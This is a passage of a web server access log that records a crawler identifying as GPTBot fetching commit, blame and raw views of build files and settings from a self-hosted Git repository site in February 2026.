10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13558] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15173] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10211] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 10090] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:16:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/package.json" -[17/Feb/2026:16:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/package.json" -[17/Feb/2026:16:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=HTML&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6303] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:16:15:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:16:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/metadata.json" -[17/Feb/2026:16:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Roff&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6305] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:16:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html" [Client 74.7.227.38] [Length 39779] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:15:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" -[17/Feb/2026:16:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build" -[17/Feb/2026:16:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" -[17/Feb/2026:16:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build" -[17/Feb/2026:16:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" -[17/Feb/2026:16:15:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" -[17/Feb/2026:16:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build" -[17/Feb/2026:16:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" -[17/Feb/2026:16:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" -[17/Feb/2026:16:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" -[17/Feb/2026:16:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" -[17/Feb/2026:16:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" -[17/Feb/2026:16:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21349] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21028] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11309] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10703] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10702] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10702] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10701] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 